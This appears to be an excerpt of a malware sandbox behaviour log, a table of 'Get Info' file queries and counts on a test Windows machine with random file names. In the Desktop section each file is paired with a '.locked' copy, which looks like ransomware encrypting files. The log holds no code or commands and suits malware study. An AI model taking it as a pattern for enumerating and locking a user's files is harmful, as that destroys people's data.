| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\TW8F PgmZP1TQs q.png | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\Camera Roll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\Saved Pictures | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Saved Games | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Searches | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos | type = file_attributes |
|
26 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv | type = file_attributes |
|
18 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By | type = file_attributes |
|
14 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e | type = file_attributes |
|
13 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6 | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\7GVX7gkcEUhn3q | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\9CmFB.flv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\LY1slfAHpA0CjOl.flv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\MVTyfMHdBH4hTZ.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\kU8W1Obiy0WAauUs13Q.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4 | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\ya7kK0B XrEiCCR28lY.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0OcnFskVldPj.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\K8vnCwfcmYIXr3V.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\Np__vdLtlZlc-.flv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\n1mrF.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\oAVejMubKlrV5_6y6hZw.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\HvvHqo0ADHwSN3BP13g.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\jnZv.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\ODdpytAn9-lWgNlGrF.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\ReeG4dx.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\2Fxr.flv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\eRyEYq-B.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\Et3YlzqRrM1z-73.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\m_1Jy6jg.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\w2PClaQ4pHd.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_attributes |
|
4 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_type |
|
4 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\bwx6RzhfH12 -D9X-.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\bwx6RzhfH12 -D9X-.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\bwx6RzhfH12 -D9X-.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\bwx6RzhfH12 -D9X-.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\EwENjQ-2d0tAcd6ire.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\EwENjQ-2d0tAcd6ire.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\EwENjQ-2d0tAcd6ire.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\EwENjQ-2d0tAcd6ire.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\MrBvDZJ m.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\MrBvDZJ m.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\MrBvDZJ m.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\MrBvDZJ m.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\9hROPZxqd4oOUgNFcHG.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\9hROPZxqd4oOUgNFcHG.xls.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\9hROPZxqd4oOUgNFcHG.xls.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\9hROPZxqd4oOUgNFcHG.xls.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\F1deKy.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\F1deKy.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\F1deKy.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\F1deKy.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\JZFTTemDyGDvi.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\JZFTTemDyGDvi.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\JZFTTemDyGDvi.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\JZFTTemDyGDvi.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\qN-C1SB2E4bTdX0 wrX.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\qN-C1SB2E4bTdX0 wrX.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\qN-C1SB2E4bTdX0 wrX.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\qN-C1SB2E4bTdX0 wrX.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\AzQwVoefGF.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\AzQwVoefGF.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\AzQwVoefGF.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\AzQwVoefGF.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\CWVTT.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\CWVTT.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\CWVTT.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\CWVTT.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\dLpUl.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\dLpUl.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\dLpUl.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\dLpUl.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\FMp1Rv9H0sIwMbUMaP.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\FMp1Rv9H0sIwMbUMaP.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\FMp1Rv9H0sIwMbUMaP.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\FMp1Rv9H0sIwMbUMaP.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\I0i3yftI1x.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\I0i3yftI1x.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\I0i3yftI1x.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\I0i3yftI1x.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KUODyadDcFJDHZ5D5Sn.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KUODyadDcFJDHZ5D5Sn.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KUODyadDcFJDHZ5D5Sn.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KUODyadDcFJDHZ5D5Sn.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\OqtVBc3Qo2qAnhFLH2.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\OqtVBc3Qo2qAnhFLH2.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\OqtVBc3Qo2qAnhFLH2.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\OqtVBc3Qo2qAnhFLH2.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3.locked | type = file_type |
|
2 | |
